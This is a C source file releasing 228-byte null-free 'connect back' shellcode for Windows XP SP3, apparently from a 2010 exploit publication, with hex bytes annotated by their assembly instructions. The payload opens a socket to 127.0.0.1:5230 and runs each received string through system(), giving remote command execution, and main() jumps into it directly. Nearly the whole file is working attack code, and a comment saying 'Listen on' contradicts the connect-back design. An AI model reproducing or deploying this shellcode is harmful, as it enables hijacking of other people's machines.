/*------------------------------------------------------------------------
Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes
Release Date............12/7/2010
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------*/
int main(int argc, char *argv[])
{
// Listen on 127.0.0.1:5230
char* shellcode=
"\x33\xDB" // xor ebx,ebx
"\xC7\x45\x08\x40\xAE\x80\x7C" // mov dword ptr [argc],7C80AE40h
"\xC7\x45\x04\x7B\x1D\x80\x7C" // mov dword ptr [ebp+4],7C801D7Bh
"\x68\x64\x6C\x6C\x01" // push 16C6C64h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x6B\x33\x32\x2E" // push 2E32336Bh
"\x68\x77\x73\x6F\x63" // push 636F7377h
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x8B\xF0" // mov esi,eax
"\x53" // push ebx
"\xC6\x04\x24\x75" // mov byte ptr [esp],75h
"\xC6\x44\x24\x01\x70" // mov byte ptr [esp+1],70h
"\x68\x74\x61\x72\x74" // push 74726174h
"\x68\x57\x53\x41\x53" // push 53415357h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x13" // sub esp,13h
"\x54" // push esp
"\x54" // push esp
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x74" // mov byte ptr [esp+1],74h
"\x68\x73\x6F\x63\x6B" // push 6B636F73h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x01" // push 1
"\x6A\x02" // push 2
"\xFF\xD0" // call eax
"\x89\x45\xFC" // mov dword ptr [ebp-4],eax
"\x68\x65\x63\x74\x01" // push 1746365h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x63\x6F\x6E\x6E" // push 6E6E6F63h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x6A\x01" // push 1
"\x6A\x7F" // push 7Fh
"\xC6\x44\x24\x03\x01" // mov byte ptr [esp+3],1
"\x68\x02\x01\x14\x6E" // push 6E140102h
"\xD0\x6C\x24\x01" // shr byte ptr [esp+1],1
"\x8B\xFC" // mov edi,esp
"\x6A\x10" // push 10h
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\x68\x72\x65\x63\x76" // push 76636572h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x7F" // push 7Fh
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x6C" // mov byte ptr [esp],6Ch
"\xC6\x44\x24\x01\x6C" // mov byte ptr [esp+1],6Ch
"\x68\x72\x74\x2E\x64" // push 642E7472h
"\x68\x6D\x73\x76\x63" // push 6376736Dh
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x6D" // mov byte ptr [esp+1],6Dh
"\x68\x73\x79\x73\x74" // push 74737973h
"\x54" // push esp
"\x50" // push eax
"\xFF\x55\x08" // call dword ptr [argc]
"\x57" // push edi
"\xFF\xD0" // call eax
"\xEB\xBB" // jmp recv_loop (4010B3h)
;
printf("shellcode length: %i", strlen(shellcode));
__asm jmp shellcode
return 0;
}